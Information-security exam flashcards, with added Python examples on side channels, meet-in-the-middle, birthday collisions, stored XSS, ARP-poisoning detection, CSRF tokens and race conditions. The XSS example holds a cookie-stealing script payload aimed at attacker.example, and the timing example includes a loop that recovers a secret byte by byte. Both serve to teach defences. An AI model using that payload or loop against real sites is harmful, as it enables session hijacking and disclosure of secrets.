Exam II Flashcards
Denial of service becomes more possible
- if the service is distributed to many sites that must occasionally synchronize their data.
- if the service can be accessed through several addresses, some of which can be administratively blocked in case of too many requests.
- if the security policy dictates that too many failed attempts to log in lead to a temporary lock-out.
- if the authentication of clients requires a proof-of-effort from them.
- if the security policy dictates that too many failed attempts to log in lead to a temporary lock-out.
Three of these five: Ping of Death, Ping sweep, Smurf, Spyware and SYN flood, are examples of attacks directly against confidentiality. integrity. authentication. availability.
availability.
What is an example of a cyber attack?
An insider in a technology firm doing industrial espionage for a foreign company.
A group of script kiddies trying their skills randomly and managing to launch a distributed DoS attack against a government agency.
Using social engineering to inject code into a city’s central water supply system and causing it to crash.
Terrorists causing severe damage to the infrastructure by explosives.
Using social engineering to inject code into a city’s central water supply system and causing it to crash.
A web cookie is a piece of information stored at the
web server and concerning the browser program.
web server and concerning the browsing person.
browser and concerning the browsing person.
browser and concerning the visits to the server.
browser and concerning the visits to the server.
There are three models of cloud services, SaaS, IaaS and PaaS, that is, ‘S’, ‘I’ and ‘P’ as a service, where
S=software, I=infrastructure, P=platform
S=security, I=integrity, P=process
S=safety, I=internet, P=premises
S=software, I=infrastructure, P=procedure
S=software, I=infrastructure, P=platform
Data mining is the opposite of data hiding. an attack against privacy. a method to handle big data. a method of cryptanalysis.
a method to handle big data.
Advanced persistent threat refers to
a vulnerability that has not been patched.
a threat actor with plentiful resources who has gained unauthorized access to an information system and stays undetected for an extended period of time.
a Trojan horse that applies some novel method to compromise the system where it is residing.
a zero-day vulnerability, which the finder has sold to some party other than the manufacturer or vendor who is responsible for patching it.
a threat actor with plentiful resources who has gained unauthorized access to an information system and stays undetected for an extended period of time.
When an attacker combines the methods of aggregation and inference against a large collection of data, what is he most likely attempting to do?
Extracting sensitive information from non-sensitive data items in databases.
Abusing social media.
A known-plaintext attack against encryption.
Password cracking.
Extracting sensitive information from non-sensitive data items in databases.
What is the term used for attacks where each successful transaction benefits the attacker only very little but the number of transactions is high? email spam phishing salami attack DDoS
salami attack
In the physical information security the concept of baiting means
blackmailing with something questionable that the victim has done.
stealing a device and requesting ransom for it.
letting the victim find a curiosity-arousing media container.
causing damage to rotating memory disks by perturbing their speed.
letting the victim find a curiosity-arousing media container.
Alice cannot figure out how her colleague Bob gained unauthorized access to her information system, because Bob has little computer experience. However among the following she can easily rule out all except a covert channel. social engineering. a dictionary attack. shoulder surfing.
shoulder surfing.
An internet troll is a type of
fake news that is spreading unusually fast.
anonymous communication protocol.
author of disturbing messages.
hacker who is trying to find and sell vulnerabilities to anyone who wants to pay.
author of disturbing messages.
The concept deepfake is related to steganography. side channels in multimedia. forged video. anonymous commerce on counterfeit products.
forged video.
Which attack is based on information gained from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself (e.g. cryptanalysis and software bugs)? Timing information, power consumption, electromagnetic leaks or even sound can provide a means for this. a side-channel attack implicit attack direct-access attack brute-force attack
a side-channel attack
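The side channel in the card above, as an added example that is not part of the original flashcards: a token check that exits at the first mismatching byte leaks, through how long it runs, how many leading bytes of the guess were right. Instead of measuring wall-clock time, the vulnerable compare below reports the number of byte comparisons it performed, which is exactly what an attacker measures as time over the network. The secret token and the recovery loop are constructed for illustration; the fixed compare uses hmac.compare_digest from the standard library.

```python
"""Timing side channel in a byte-by-byte secret comparison (added example).

The leak is the number of comparisons (observable as time) before the
early exit. SECRET is a constructed token the attacker does not know.
"""
import hmac

SECRET = b"s3cr3t!"   # constructed example token


def leaky_compare(secret: bytes, guess: bytes) -> tuple[bool, int]:
    """Early-exit compare. Returns (equal, number_of_byte_comparisons).
    The count grows by one for every leading byte the guess gets right,
    so the 'time' reveals the secret one byte at a time."""
    if len(secret) != len(guess):
        return False, 0
    ops = 0
    for s, g in zip(secret, guess):
        ops += 1
        if s != g:
            return False, ops
    return True, ops


def constant_time_compare(secret: bytes, guess: bytes) -> tuple[bool, int]:
    """Fixed-cost compare: hmac.compare_digest looks at every byte, so the
    observable cost is the same for every guess of the right length."""
    return hmac.compare_digest(secret, guess), len(secret)


def recover_secret(compare, length: int) -> bytes:
    """Attacker's loop: for each position try all 256 byte values against
    the server (here: `compare` applied to SECRET) and keep the value that
    makes the server work the longest. With the leaky compare this is the
    correct byte; with the constant-time compare every value looks alike."""
    known = bytearray()
    for pos in range(length):
        best_byte, best_ops = 0, -1
        for b in range(256):
            guess = bytes(known) + bytes([b]) + b"\x00" * (length - pos - 1)
            ok, ops = compare(SECRET, guess)
            if ok:                      # full match found (last position)
                return bytes(guess)
            if ops > best_ops:
                best_byte, best_ops = b, ops
        known.append(best_byte)
    return bytes(known)


if __name__ == "__main__":
    print("leaky    :", recover_secret(leaky_compare, len(SECRET)))
    print("constant :", recover_secret(constant_time_compare, len(SECRET)))
```

Against the leaky compare the loop needs at most 256 guesses per byte instead of 256 to the power of the token length; against the constant-time compare it learns nothing and returns all zero bytes. Real measurements are noisy, so an attacker repeats each guess and averages, but the principle is the one shown here.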
Meet-in-the-middle is an attack type where
password hashes are broken by optimizing the use of rainbow tables.
a cryptographic algorithm is broken at about a square root of effort by working both from the start and end toward the middle.
the attacker or his process relays modified messages between two unknowing communication parties.
the statistics of the birthday paradox are simultaneously applied to identity theft of many individuals.
a cryptographic algorithm is broken at about a square root of effort by working both from the start and end toward the middle.
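The "square root of effort" in the card above, as an added example that is not from the original flashcards: double encryption with two independent 16-bit keys should cost 2^32 trials to brute-force, but meeting in the middle costs about 2^16 encryptions plus 2^16 decryptions and a lookup table. The toy cipher, the keys and the plaintexts are all constructed for this illustration; the cipher is deliberately weak and only needs to be invertible.

```python
"""Meet-in-the-middle against double encryption (added example).

C = E_k2(E_k1(P)) with 16-bit keys. Brute force: 2^16 * 2^16 trials.
MITM: encrypt P under every k1 (table), decrypt C under every k2,
and look for a match in the middle: 2^16 + 2^16 trials.
"""
from __future__ import annotations

MASK = 0xFFFF            # 16-bit blocks and 16-bit keys
K1, K2 = 0x3A7F, 0xC0DE  # constructed secret keys the attacker must recover
PLAINTEXTS = [0x1234, 0xBEEF, 0x0042]  # constructed known plaintexts


def rotl(x: int, r: int) -> int:
    return ((x << r) | (x >> (16 - r))) & MASK


def rotr(x: int, r: int) -> int:
    return ((x >> r) | (x << (16 - r))) & MASK


def enc(k: int, p: int) -> int:
    """Toy block cipher: xor key, rotate, add key. Weak on purpose."""
    return (rotl(p ^ k, 5) + k) & MASK


def dec(k: int, c: int) -> int:
    """Exact inverse of enc."""
    return rotr((c - k) & MASK, 5) ^ k


def double_enc(k1: int, k2: int, p: int) -> int:
    return enc(k2, enc(k1, p))


def known_pairs() -> list[tuple[int, int]]:
    """What the attacker has: plaintext/ciphertext pairs under the unknown keys."""
    return [(p, double_enc(K1, K2, p)) for p in PLAINTEXTS]


def meet_in_the_middle(pairs: list[tuple[int, int]]) -> tuple[list[tuple[int, int]], int]:
    """Recover (k1, k2). Returns the surviving key pairs and the number of
    single-cipher operations spent in the two main sweeps."""
    p0, c0 = pairs[0]
    ops = 0
    # sweep 1: work forward from the plaintext, index middle values by k1
    forward: dict[int, list[int]] = {}
    for k1 in range(MASK + 1):
        forward.setdefault(enc(k1, p0), []).append(k1)
        ops += 1
    # sweep 2: work backward from the ciphertext; a hit is a candidate pair
    candidates: list[tuple[int, int]] = []
    for k2 in range(MASK + 1):
        mid = dec(k2, c0)
        ops += 1
        for k1 in forward.get(mid, ()):
            # the first pair leaves ~2^32/2^16 chance matches; the other
            # known pairs filter them out
            if all(double_enc(k1, k2, p) == c for p, c in pairs[1:]):
                candidates.append((k1, k2))
    return candidates, ops


if __name__ == "__main__":
    cands, ops = meet_in_the_middle(known_pairs())
    print(f"candidates={[(hex(a), hex(b)) for a, b in cands]} ops={ops} "
          f"(brute force would be {2 ** 32})")
```

The table costs memory proportional to 2^16 entries, which is the usual trade: time is cut to roughly the square root, space grows to match. This is the reason double DES was never considered a fix for the 56-bit DES key, and why triple DES is the variant that was standardised.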
A birthday attack is a way to
make inferences on private personal data from social media posts.
“paradoxically” find a hash collision much faster than an input that gives a particular hash.
boost social engineering, by knowing not only the birthday of the victim but also an approaching birthday of a colleague of the victim.
crack an average person’s passwords faster in case his or her birthday is known.
“paradoxically” find a hash collision much faster than an input that gives a particular hash.
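The birthday paradox from the card above, as an added example that is not from the original flashcards: with a hash of N bits, finding any two inputs that collide takes about the square root of the number of trials that finding an input for one given digest takes. SHA-256 is truncated to 16 bits here so that both searches finish in well under a minute; the messages and the target are constructed for the example.

```python
"""Birthday search versus preimage search on a truncated hash (added example)."""
from __future__ import annotations
import hashlib
import math

BITS = 16  # truncation width: 2^16 = 65536 possible digests


def h(msg: bytes, bits: int = BITS) -> int:
    """SHA-256 truncated to the top `bits` bits, as an integer."""
    digest = hashlib.sha256(msg).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def find_collision(bits: int = BITS) -> tuple[bytes, bytes, int]:
    """Birthday attack: hash distinct messages, remember each digest, stop at
    the first repeat. Returns (msg_a, msg_b, trials)."""
    seen: dict[int, bytes] = {}
    i = 0
    while True:
        msg = b"msg-%d" % i          # constructed message sequence
        d = h(msg, bits)
        if d in seen:
            return seen[d], msg, i + 1
        seen[d] = msg
        i += 1


def find_preimage(target: int, bits: int = BITS, limit: int = 1 << 20) -> tuple[bytes | None, int]:
    """Preimage search: hash messages until one matches the given digest.
    Returns (msg, trials), or (None, limit) if the cap is reached."""
    for i in range(limit):
        msg = b"pre-%d" % i          # constructed message sequence
        if h(msg, bits) == target:
            return msg, i + 1
    return None, limit


def expected_trials(bits: int) -> tuple[float, int]:
    """Analytic expectations: collision ~ sqrt(pi/2 * 2^bits), preimage ~ 2^bits."""
    return math.sqrt(math.pi / 2 * 2 ** bits), 2 ** bits


if __name__ == "__main__":
    a, b, n_coll = find_collision()
    print(f"collision: {a!r} and {b!r} share digest {h(a):#06x} after {n_coll} trials")
    target = h(b"target")        # constructed target digest
    m, n_pre = find_preimage(target)
    print(f"preimage : {m!r} hits {target:#06x} after {n_pre} trials")
    print("expected :", expected_trials(BITS))
```

For 16 bits the expected numbers are about 321 trials for a collision and 65536 for a preimage. This is why a hash used for signatures needs twice the security level in bits that a brute-force argument alone would suggest: an attacker who can get two documents signed chooses both, and only needs a collision.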
Rooting
is an attack type where an outside intruder gets administrative rights to an operating system.
is a term referring to methods of overriding the limitations of the OS for installing programs from any sources.
involves alteration of OS access controls on a computer in such a way that all users have administrative rights.
means that an attacker has been able to alter the initial operations that a computer does before the OS starts.
is a term referring to methods of overriding the limitations of the OS for installing programs from any sources.
A root kit is
a term referring to methods of breaking the limitations of the OS for installing programs from various sources.
a set of tools for breaking the DRM limitations of multimedia software with respect to viewing, copying and modifying content.
a collection of software tools which - after getting to a computer - allow the attacker to access the machine with root privileges.
the common name for versions of a computer virus that attaches to one of the supervisor or kernel modules.
a collection of software tools which - after getting to a computer - allow the attacker to access the machine with root privileges.
Which two of these statements are true? (i) Only about one-fifth of computer viruses come from optical disks, memory sticks, and other storage media (ii) Files with .bat and .pif as name extensions can contain malware. (iii) Antivirus software vendors update virus identification databases usually a few times an hour. (iv) A memory-based virus scan program is constantly running and scans the programs before they start.
(ii) & (iv)
(i) & (iv)
(ii) & (iii)
(i) & (iii)
(ii) & (iv)
Which two of these claims are true? (i) More than a quarter of computer viruses come from optical disks, memory sticks, and other removable media. (ii) Files with .scr and .pif as name extensions can contain malware. (iii) Antivirus software vendors usually have to update virus identification data twice a week. (iv) Heuristic-based antivirus software does not need to be updated as often as software that is based on traditional scanning.
(ii) & (iii)
(ii) & (iv)
(i) & (iii)
(i) & (iv)
(ii) & (iv)
None of the following is a definition of a buffer overflow, but which one best describes it?
The program counter, i.e. the address of the next instruction to be executed, is moved forward by one, even if it is already in the last instruction of the subroutine.
It is always a security threat because an attacker can use it to cause evil - at least a program crash.
A memory reference made by a program points to another process’s memory area.
A number larger than the array size is used to index the array, and the operating system does not block this reference.
A number larger than the array size is used to index the array, and the operating system does not block this reference.
Depending only on their context, a sequence of bits in the memory of a computer can mean either data or instructions. This can lead to attacks of type impersonation. injection. buffering. bit rot.
injection.
A covert channel
is a way of communicating that is hidden from the access control mechanisms.
was originally meant for transmitting inaudible signals between computer peripherals but was deprecated since attackers found a way to abuse it.
refers to a data transfer mechanism that an attacker has enabled between computer processes even if it should have been disabled according to the security policy.
is a performance-optimizing design that allows data flow through a common kernel process serving different users.
is a way of communicating that is hidden from the access control mechanisms.
Assume that two processes compete for a shared resource. If they cooperate in such a way that the system's security policy is violated, the situation is called a race condition. object reuse. a covert channel. denial of service.
a covert channel.
Assume a web site allows users to input data that other users retrieve later. If those data are not intended to be executed by the retrieving browsers, but this still happens, the input validation has failed to prevent a cross-site scripting. cross-site request forgery. malicious file execution. database injection.
cross-site scripting.
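The stored cross-site scripting case from the card above, as an added example that is not from the original flashcards: a comment is saved once and later embedded in a page served to other users. The vulnerable renderer interpolates it raw, so the retrieving browser executes it; the fixed renderer encodes it for the HTML text context with the standard library's html.escape. The comment, the template and the crude script-tag check are constructed for this illustration.

```python
"""Stored XSS: raw interpolation versus output encoding (added example)."""
import html
import re

# constructed attacker input, stored server-side and served to every later visitor
STORED_COMMENT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

# constructed page fragment; {body} is where the comment is placed
TEMPLATE = '<p class="comment">{body}</p>'


def render_vulnerable(comment: str) -> str:
    """Raw interpolation: the browser parses the comment as markup."""
    return TEMPLATE.format(body=comment)


def render_fixed(comment: str) -> str:
    """Output encoding for the HTML text context: & < > " ' become entities,
    so the browser displays the comment as text and executes nothing."""
    return TEMPLATE.format(body=html.escape(comment, quote=True))


_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(page: str) -> bool:
    """Crude check used for the demonstration: is there a live <script> tag?"""
    return _SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    print(render_vulnerable(STORED_COMMENT))
    print(render_fixed(STORED_COMMENT))
```

html.escape is correct for the text content of an element. A value placed inside an attribute, a URL, or a JavaScript string needs the encoding for that context; using a template engine that auto-escapes per context is the practical way to get this right everywhere.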
Race condition is
a low level vulnerability in program code, usually at the OS kernel level.
the situation where a denial of service has already happened but not to all processes.
a situation where two processes can raise their privilege wrongly to compete for more resources.
a situation where two processes try to access a single resource at the same time and the resulting sequence of accesses may be wrong.
a situation where two processes try to access a single resource at the same time and the resulting sequence of accesses may be wrong.
A virus can do nothing if its code is just read but not run. Why then does the MS-Word macro virus start, even if the document containing it is only read from disk to Word?
An infected document contains program code that Word runs after reading the document.
The virus is memory-resident and infects documents when they are opened.
An infected document contains program code which, when read into Word, causes a buffer overflow in Word and ends up being executed after all.
The virus has also infected Word’s program code.
An infected document contains program code that Word runs after reading the document.
Threats to network communications can be summarized in five fundamental cases, one of which is the unauthorized use of a resource over the network. The other four deal with the "fate" of messages. If each of these four cases is seen as a breach of either confidentiality, integrity or availability, then there will be two cases breaching integrity. availability. both confidentiality and availability. both integrity and confidentiality.
integrity.
On which layer of the TCP/IP stack does routing operate? Physical layer. Network layer. Transport layer. Data-link layer.
Network layer.
On which layer of the TCP/IP stack does Ethernet (IEEE 802.3) operate? Physical layer. Network layer. Data-link layer. Transport layer.
Data-link layer.
A wormhole attack happens when two colluding attackers at non-adjacent locations of a (wireless) network have a direct connection and by replaying routing information cause traffic to flow through their link. This gives a good opportunity for money laundering. cryptanalysis. seeing confidential data. stopping the network.
seeing confidential data.
ARP poisoning
is a result of an attacker sending fake ARP messages within a LAN.
results from an attacker randomly changing several MAC addresses of devices in a local network.
halts the operation of a LAN because the addresses in the ARP table point to non-existent MACs.
happens when malware corrupts the program that runs the Address Resolution Protocol.
is a result of an attacker sending fake ARP messages within a LAN.
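The fake ARP messages from the card above, seen from the defender's side, as an added example that is not from the original flashcards: a passive monitor keeps its own IP-to-MAC table and flags any reply that rebinds an IP it already knows to a different MAC, and any MAC that claims more than one IP. The capture is a constructed list of ARP reply records, with an attacker MAC that first claims the gateway's IP and then a workstation's.

```python
"""Detecting ARP poisoning from observed ARP replies (added example)."""
from __future__ import annotations
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    t: float          # seconds since capture start
    sender_ip: str    # IP the reply claims
    sender_mac: str   # MAC it claims the IP belongs to


# constructed capture: legitimate replies first, then forged ones
CAPTURE = [
    ArpReply(0.0, "192.168.1.1",  "00:11:22:33:44:01"),   # gateway
    ArpReply(0.5, "192.168.1.10", "00:11:22:33:44:10"),   # workstation
    ArpReply(1.0, "192.168.1.20", "00:11:22:33:44:20"),   # printer
    ArpReply(2.0, "192.168.1.1",  "00:0c:29:aa:bb:cc"),   # forged: gateway IP, attacker MAC
    ArpReply(2.1, "192.168.1.1",  "00:0c:29:aa:bb:cc"),   # forged, repeated
    ArpReply(3.0, "192.168.1.10", "00:0c:29:aa:bb:cc"),   # forged: victim's IP too
]


class ArpMonitor:
    """Remembers the first MAC seen for each IP and reports later conflicts."""

    def __init__(self) -> None:
        self.table: dict[str, str] = {}
        self.alerts: list[str] = []

    def observe(self, r: ArpReply) -> None:
        known = self.table.get(r.sender_ip)
        if known is None:
            self.table[r.sender_ip] = r.sender_mac
        elif known != r.sender_mac:
            self.alerts.append(f"t={r.t:.1f}s {r.sender_ip} rebound {known} -> {r.sender_mac}")


def analyse(capture: list[ArpReply]) -> tuple[dict[str, str], list[str]]:
    """Run the monitor over a capture; returns (table, alerts)."""
    m = ArpMonitor()
    for r in capture:
        m.observe(r)
    return m.table, m.alerts


def macs_claiming_multiple_ips(capture: list[ArpReply]) -> set[str]:
    """Second signal: one MAC answering for several IPs (typical of a poisoner
    who wants both directions of a victim-to-gateway conversation)."""
    ips_per_mac: dict[str, set[str]] = {}
    for r in capture:
        ips_per_mac.setdefault(r.sender_mac, set()).add(r.sender_ip)
    return {mac for mac, ips in ips_per_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    table, alerts = analyse(CAPTURE)
    print("\n".join(alerts))
    print("multi-IP MACs:", macs_claiming_multiple_ips(CAPTURE))
```

The monitor trusts the first binding it sees, which is the same assumption a real host makes; a legitimate change (a replaced network card, DHCP handing an address to a new device) therefore also raises an alert and has to be cleared by an operator. Static ARP entries for the gateway, or dynamic ARP inspection on the switch, remove the attack rather than just detect it.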
Scanning is a systematic search for something. Which of the following scans is least useful for finding targets of attack or abuse? wardialing portsweep wardriving webcrawling
webcrawling
Which of these properties is true about link encryption? (i) It is recommended for environments with high confidentiality requirements. (ii) It encrypts routing information. (iii) It provides confidentiality for traffic flow.
(ii) and (iii), but not (i)
(i) and (ii), but not (iii)
(i) and (iii), but not (ii)
(i) , (ii) and (iii)
(ii) and (iii), but not (i)
When a user runs scripts - written by an attacker - on one web page and they cause damage on another page, which the user has open in the browser, what sort of attack is happening? OWASP XSS CSRF CVE
CSRF
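The CSRF case from the card above, as an added example that is not from the original flashcards: a page the attacker controls can make the victim's browser submit a request to another site, and the browser attaches the victim's session cookie to it, so the cookie alone cannot prove the user intended the action. The server below derives a per-session token from a server-side key and refuses any state-changing request that does not present it; the attacker's page cannot read the victim's token. The key, session ids and requests are constructed, and request handling is reduced to a dict so the check runs without a web framework.

```python
"""Synchronizer token against cross-site request forgery (added example)."""
from __future__ import annotations
import hashlib
import hmac

SERVER_KEY = b"constructed-server-secret"   # constructed; keep secret and rotate in practice


def csrf_token(session_id: str) -> str:
    """Token bound to one session: HMAC(server_key, session_id). It is put
    into the site's own forms and is unreadable from another origin."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(request: dict) -> tuple[int, str]:
    """POST /transfer. The cookie identifies the user; the token proves the
    request came from a page this site served to that user."""
    session_id = request.get("cookie_session")
    if not session_id:
        return 401, "no session"
    presented = request.get("form_csrf_token", "")
    if not hmac.compare_digest(presented, csrf_token(session_id)):
        return 403, "csrf token missing or wrong"
    return 200, f"transferred {request['form_amount']} to {request['form_to']}"


# victim's browser submitting the site's own form: cookie and token present
LEGIT = {"cookie_session": "sess-42", "form_csrf_token": csrf_token("sess-42"),
         "form_amount": "10", "form_to": "alice"}

# attacker's page auto-submits a form: the browser attaches the cookie, but
# the attacker cannot read the victim's token, so it is absent ...
FORGED = {"cookie_session": "sess-42", "form_amount": "10000", "form_to": "mallory"}

# ... or the attacker pastes in a token from their own session, which is
# bound to a different session id and therefore does not verify
FORGED_OWN_TOKEN = dict(FORGED, form_csrf_token=csrf_token("sess-attacker"))


if __name__ == "__main__":
    for name, req in [("legit", LEGIT), ("forged", FORGED), ("own-token", FORGED_OWN_TOKEN)]:
        print(name, handle_transfer(req))
```

In practice this token is combined with a SameSite attribute on the session cookie and a check of the Origin header; each defence covers cases the others miss, and none of them helps if the site also has an XSS hole, because script running in the site's own origin can read the token.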
Besides a physical meaning the concept of access control is defined as “The process of granting or denying specific requests to obtain and use information and related information processing services”. What is the significance of the word “specific” here?
It denotes the fact that not all requests are submitted to the granting/denying process.
Without that word the defined scope would be overly large, covering all levels from the OS kernel to the application layer.
Omitting the word would not change the meaning, because all requests of the defined kind are specific in some sense.
It limits the scope of access control to the moment when the request happens - in contrast to the policy level that tells how the granting/denying process should work.
It limits the scope of access control to the moment when the request happens - in contrast to the policy level that tells how the granting/denying process should work.
Investigate the claim: As a security goal, Availability, or Usability, means that information or services are stored and accessible sooner or later. It is false because
the term usability should not be used in the same sense as the term availability.
availability requires that the data be accessed within a set time limit.
in terms of security, availability only applies to information and usability only to services.
usability also requires that the data have not changed uncontrollably.
availability requires that the data be accessed within a set time limit.
Identity is a profound concept in information systems. Count how many of the following operations can be done to it: Identity can be (i) offered as a service, (ii) changed, (iii) confiscated, (iv) stolen, (v) verified, (vi) spoofed. 5 3 4 6
5
Assume Bob worked in an organization until he was terminated. Which of the following is an example of the organization’s information systems failing according to the TOCTOU principle (Time of Check/Time of Use)?
Bob causes harm in the information system, and it turns out from the logs that this happened while he was still logged in after his termination.
Bob manages to solicit new sensitive information from the organization by using his old knowledge of the organization to masquerade as a current employee.
Bob gradually damages the file system by a remote-access program he had installed while he was still an employee.
A program destroys files. It turns out that Bob had installed the program while he was still an employee, and its action was triggered when it no longer saw Bob logged in within the last month.
Bob causes harm in the information system, and it turns out from the logs that this happened while he was still logged in after his termination.
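The race-condition card and the TOCTOU card above describe the same failure from two angles: a check is made, something else happens, and the result of the check is used after it has gone stale (Bob's login was checked before his termination and used after it). As an added example that is not from the original flashcards, two withdrawals below each check a shared balance and then debit it. The steps of each withdrawal are generators, so the interleaving is chosen explicitly instead of being left to a thread scheduler: when both checks run before either debit, both pass and the account is overdrawn. The fixed version performs check and use inside one critical section. Balances and amounts are constructed.

```python
"""Check-then-use race on a shared resource, with a reproducible interleaving
(added example)."""
from __future__ import annotations
import threading
from typing import Callable, Iterator


class Account:
    """The shared resource both processes compete for."""

    def __init__(self, balance: int) -> None:
        self.balance = balance
        self.lock = threading.Lock()


def withdraw_racy(acct: Account, amount: int) -> Iterator[str]:
    """Time of check, an interleaving point, then time of use."""
    if acct.balance >= amount:          # time of check
        yield "checked"                 # another process may run here
        acct.balance -= amount          # time of use: the check may be stale
        yield "debited"
    else:
        yield "refused"


def withdraw_safe(acct: Account, amount: int) -> Iterator[str]:
    """Check and use in one critical section: nothing runs between them."""
    with acct.lock:
        ok = acct.balance >= amount
        if ok:
            acct.balance -= amount
    yield "debited" if ok else "refused"


def run_interleaved(acct: Account,
                    withdraw: Callable[[Account, int], Iterator[str]],
                    amounts: list[int],
                    order: list[int]) -> list[str]:
    """Deterministic scheduler: advance process order[i] by one step each time.
    Returns the step log; the account holds the resulting balance."""
    procs = [withdraw(acct, a) for a in amounts]
    log: list[str] = []
    for i in order:
        try:
            log.append(f"p{i}:{next(procs[i])}")
        except StopIteration:
            pass                        # that process has already finished
    return log


if __name__ == "__main__":
    for name, fn in [("racy", withdraw_racy), ("safe", withdraw_safe)]:
        acct = Account(100)
        log = run_interleaved(acct, fn, [80, 80], [0, 1, 0, 1])
        print(f"{name}: {log} -> balance {acct.balance}")
```

With the order [0, 0, 1, 1] the racy version happens to behave correctly, which is why such bugs survive testing: the damage depends on a timing the test never produced. The lock in withdraw_safe is what a real multi-threaded version needs; here it only shows the shape of the fix, since the generator scheduler never runs two steps at once.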
The worst enemy of security may be a human being, but what is the second worst - often also called the worst? multilayerness single-levelness the weakest link in the chain none of these
none of these
An administrator grants access rights to a group of users called "HR" instead of granting rights to each member individually. This is an example of a security mechanism called layering. data hiding. abstraction. polyinstantiation.
abstraction.
The over-100-year-old principle of Kerckhoffs
concerns the separate nature of an algorithm and its parameters.
is in current parlance known also as the onion (protection) principle.
has been obsoleted by the invention of public key cryptography.
says that locks are for honest people.
concerns the separate nature of an algorithm and its parameters.
The security of a mechanism shall not be based on the secrecy of its design or implementation. This is the principle of an open model. Which of the following is an example of complying with this?
A corporate network is defended by a two-tier system in which the structure of the outer and less important part of the network is clearly visible to the attacker and can misdirect him into focusing on it.
The security system is assembled from so simple modules that everyone can be assured of the security of each of them.
All publicly available URLs on a website are linked on a sitemap or other index page, but all non-public URLs require a login.
The single sign-on mechanism that allows the user to access various web services works regardless of the service implementation platform.
All publicly available URLs on a website are linked on a sitemap or other index page, but all non-public URLs require a login.
Encapsulation is a general protection idea whose applicability ranges from vaults to IPsec's encapsulating security payload (ESP), but which of the following is NOT another example of it? intrusion detection system TCP wrapper sandbox in Java Virtual Machine a VPN tunnel
intrusion detection system
The ____ describes the rules that need to be implemented to ensure that the security requirements are met in your organization. security policy security model reference monitor security kernel
security policy
What does accountability mean in the field of information security?
The users or their departments have to pay for the CPU and network usage, and logs are kept to enable this.
The users or their departments have to pay the costs of resolving security incidents caused by the users.
The user’s actions in the information system are recorded in log files and they are used for evaluation of the user with respect to rewards or sanctions.
The user’s actions are logged and in case of security incidents it will be known whether the user is responsible or not.
The user’s actions are logged and in case of security incidents it will be known whether the user is responsible or not.
What kind of identity is a federated identity?
The stolen identity of a victim of identity theft.
The corrected or resumed identity of a victim of identity theft.
An identity that is portable across boundaries of organizations.
The shared identity of a group of individuals acting on a common task.
An identity that is portable across boundaries of organizations.
Residual risk is a concept in risk management that
means an approximation of what is left over of risks after their treatment is done.
corresponds to measurement error in exact sciences.
defines those risks that can be safely accepted.
sets the starting point for risk assessment.
means an approximation of what is left over of risks after their treatment is done.
In choosing protection mechanisms one must take into account their applicability in different stages of the general security process. Which three stages?
policy making, threat response and remediation.
recovery, correction, and punishment of the perpetrators.
avoidance, intimidation and deterrence.
prevention, detection and response.
prevention, detection and response.
What can be considered a basic model of work in information security?
Division to the phases of prevention, detection and response.
Repeated identification of asset values and threats to them, and mitigation of risks in order of priority.
Confidentiality, integrity and availability.
Optimization to find the most economical alternative between good but expensive security measures and losses due to not using them.
Repeated identification of asset values and threats to them, and mitigation of risks in order of priority.
For mandatory access control to work the data owner must determine
a sufficient level of consensus among users.
the method of validating users’ authorization.
the users’ need to know.
the method of verifying users’ identities.
the users’ need to know.
Multilevel security is
an example of defence-in-depth.
a security model where new parts are introduced at lower assurance levels and gradually elevated to higher levels as they are evaluated.
the way how operating systems treat processes of users, running them with more or less restricted rights.
a system that simultaneously processes information at different classification levels and users with different clearance levels.
a system that simultaneously processes information at different classification levels and users with different clearance levels.
Role-based access control
is the strictest form of mandatory access control.
is implemented by considering job functions.
can be compromised by role inheritance.
does not depend on what the data owner declares.
is implemented by considering job functions.
Role-based access control, RBAC, means
an access control model that bases the access decision on pre-assigned roles of a user in relation to the requested resource.
a method to assign roles to users or revoke them in order to fulfill the security policy.
an access control model that uses such grouping of users and resources where the groups can change on the basis of previous accesses.
a method to allocate roles to users for access to various parts of the organization network.
an access control model that bases the access decision on pre-assigned roles of a user in relation to the requested resource.
CERT, Computer Emergency Response Team,
is an international company whose main task is to investigate and trace data breaches in companies.
originated in the United States and has since spread to e.g. Finland.
is a UN agency that also has offices in Finland.
in accordance with the EU directive, has also been made to operate in Finland under FICORA.
originated in the United States and has since spread to e.g. Finland.
The process of evaluating the security properties of software or a system against a set of security standards or policies is called accreditation. verification. certification. validation.
certification.
The idea of information security criteria models (e.g. Common Criteria) is mainly to
assist in the marketing of security products.
facilitate the assessment of information security.
facilitate the installation of security mechanisms.
enable automatic evaluation of products and systems with respect to security.
facilitate the assessment of information security.
One of the ISO standards 9126, 15408 and 27001 focuses on evaluation of software quality. The other two focus on information security. (i) Which is about management, and (ii) which provides evaluation criteria for IT products?
(i) 27001, (ii) 15408
(i) 15408, (ii) 27001
(i) 9126, (ii) 27001
(i) 9126, (ii) 15408
(i) 27001, (ii) 15408
An X.509 certificate is used to verify
a cryptographic key using a trusted server.
a digital signature by submitting it to a certificate authority.
the ownership of a website that uses TLS.
the binding between an identity and a cryptographic key.
the binding between an identity and a cryptographic key.
What is the offline rule for backups?
While making a backup, take your system offline, except for the connection to the backup site.
Only connect your backup to your production systems when making or retrieving the copy.
Transport your backup media physically to storage which is never online.
While making a backup to a local service or media, take your system offline.
Only connect your backup to your production systems when making or retrieving the copy.
What is the ‘3-2-1’ rule for backups?
At least 3 copies, on 2 devices, and 1 offsite.
At least 3 generations, 2 copies of each, and 1 offline.
At least 3 copies, on 2 sites, and 1 offline.
At least 3 generations, 2 copies of each, and a new copy once per day.
At least 3 copies, on 2 devices, and 1 offsite.
Intrusion detection systems use three types of information as the basis for their analysis. Which of the following is not typically included in this information?
program file checksums
characteristics of previous attacks
knowledge from previous attackers
information about current system configuration
knowledge from previous attackers
In the event of a security incident, one of the primary objectives of the response is to ensure that
the attackers are detected and stopped.
appropriate documentation about the event is maintained as chain of evidence.
there is minimal disruption to the organization’s mission.
the affected systems are immediately shut off to limit the impact.
there is minimal disruption to the organization’s mission.
What should owners do to find vulnerabilities in their information systems?
Use intrusion detection techniques.
Provide a parallel version of the system for hackers to examine.
Install a root kit.
